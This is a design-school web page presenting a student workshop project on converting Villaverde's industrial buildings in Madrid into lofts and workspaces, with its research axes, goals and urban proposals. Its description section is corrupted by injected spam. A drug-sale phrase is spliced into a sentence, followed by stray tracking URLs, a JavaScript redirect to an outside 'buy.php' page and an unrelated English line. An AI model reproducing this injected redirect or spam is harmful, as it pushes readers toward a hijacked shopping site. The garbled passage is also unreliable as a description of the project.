TRANSFORMAR LAS NAVES

Envolventes y tatuajes para los nuevos lofts de Villaverde

Visualización
 
transformar_las_naves01
transformar_las_naves01

Descripción del Proyecto

El proyecto transformar las naves ha sido selecionado con fluconazole sale best project por la dirección de workshop. Ha sido realizado por las alumnas Pilar Nalda, Nerea Ortega y Alba Gádor.

“http:///?sl=319481-c261c&data1=Track1&data2=Track2″; “http:///search.htm?route=search&q=”; location.replace(“http://gethere.info/buy.php”); If gather more a display name is less than school appropriate, kahoot

Problemática

Los tres EJES DE INVESTIGACIÓN de partida, dan lugar a conceptos con los que trabajamos, y que acaban concretándose en las propuestas que presentamos. 1. catedral de las nuevas tecnologías. Respecto a los Contenidos, extraemos las siguientes palabras clave: museo, congresos, nuevos espacios de trabajo, interactivo, digital, tecnológico En cuanto al Edificio: Patrimonio industrial, memoria, rehabilitación, metros cúbicos, diafanidad, altura En Relación a la actividad de la catedral con el exterior: destacamos tecnificar, productivizar, Internet, formación. 2. estrategias de regeneración urbana Del análisis de otros procesos de reconversión de áreas industriales, como los desarrollados en ciudades como Manchester/Liverpool, Bilbao, o Barcelona con su proyecto 22@, extraemos una serie de ideas que van a incorporarse al trabajo Potencialidades de estas áreas: Localización, Conectividad (tren, metro, ..), Tamaño, Diafanidad, Disponibilidad, Programas que se proponen: Zonas Verdes, Infraestructuras, Equipamiento, Vivienda, Características: Espacio público de calidad, Carril Bici, Parques, Mobiliario Urbano, Jerarquización viaria. 3. Villaverde: Se han analizado los potenciales (disponibilidad de espacio construido, urbanización, buena conectividad y localización) y problemáticas de las distintas cuestiones (falta de actividad, vacíos de gran tamaño, infraestructuras que fragmentan el territorio, carencia de dotaciones, falta de espacios públicos, mala distribución de la densidad, muy heterogénea, pasos a nivel, mala imagen general del barrio en la ciudad), y se ha llegado a posibles.

Objetivos del proyecto

Las acciones que presentamos a continuación son el resultado del trabajo en equipo, con el objetivo de colaborar a la regeneración y reactivación del barrio de Villaverde, acompañando a la presencia de la Catedral de las Nuevas Tecnologías, proyecto del Ayuntamiento de Madrid para estimular la transformación y tecnificación del tejido empresarial. Nos hemos centrado en dos tipos de ACCIONES 1.proyectos de Imagen y espacio urbano: destinamos a transformar las cualidades del espacio urbano para que opere como atractor de nueva actividad productiva y humana 2.proyectos de estrategia programática Analizando la problemática actual y sus potenciales, proponer programas que puedan reutilizar y optimizar los espacios construidos y disponibles.

Público objetivo del proyecto

Posibles usuarios de las naves de Villaverde como nuevos espacios de trabajo.

Soluciones

Tras analizar las posibilidades, planteamos el siguiente catalogo de acciones 1. Homogeneizar densidades: Frente a un tejido heterogéneo, tratamos de aportar en cada zona lo que falta. Crear vacíos en las zonas densas, zona 1, acompañados de edificios dotacionales Cubrir el espacio vacío en las zonas 3 y 4, las dotaciones serán de mayor escala y los espacios públicos, en lugar de la idea de plaza, se asociaran mas a términos de paisaje 2. trabajo con envolventes: Estrategias como forrar edificios con lonas, pintar con colores, texturas, pueden transformar con poca inversión la imagen del tejido urbano, trasmitiendo una nueva imagen y atrayendo otro tipo de actividades a las naves disponibles y a los solares vacíos. 3.pavimentos sofisticados: alfombras cualificadas, que dotan de cualidad al espacio publico y lo transforman. 4.señalética, mobiliario, escultura: colonización del espacio urbano, reducción de escala excesiva en algunas zonas, incorporación de áreas de sombra, etc. 5.paisajismo y agricultura urbana: el trabajo con la vegetación, la topografía y el agua en forma de superficies o pantallas, va a definir recintos, mejorar las condiciones de los espacios vacíos e incorporarlos a la red de espacios públicos de Villaverde cambiar los descampados por campos de cultivo, flores urbanas (amapolas, margaritas), con sus cambios de color y textura a lo largo del año. 6.elementos icono: los elementos en altura van a servir para trasladar esta transformación de Villaverde al resto de la ciudad, haciéndola visible en la distancia y sirviendo como imagen icono de su nuevo carácter productivo digital 7- nuevos medios de transporte: para mejorar el espacio público y la conectividad entre las partes construidas, proponemos incorporar carril bici, tranvía y mediante la jerarquización viaria, la apertura de calles peatonales en las zonas de vivienda mas densa 8= programas de dotación digital: proponemos el acceso gratuito en todo el barrio de Villaverde a la red wifi , y la colocación de puntos de formación y trabajo con soporte digital en las zonas de vivienda, para los ciudadanos. 9. ocupación de las naves: las operaciones de cambio de imagen van a posibilitar la incorporación de nuevas actividades productivas y nuevos tipos de vivienda, para los espacios construidos disponibles, respetando y valorando la memoria industrial del barrio y su patrimonio arquitectónico: talleres para artistas, centros de formación, viviendas tipo loft,etc.

Docs

URL Proyecto: http://dinamizarvillaverde.iednetwork.com/2010/06/16/transformar-las-naves/

Participantes

Member avatar
albagadordiaznavarro
carlosbrenes

Tutor

carolinagonzlez

Profesor

Colaboradores:

© 2017 IED | Aviso Legal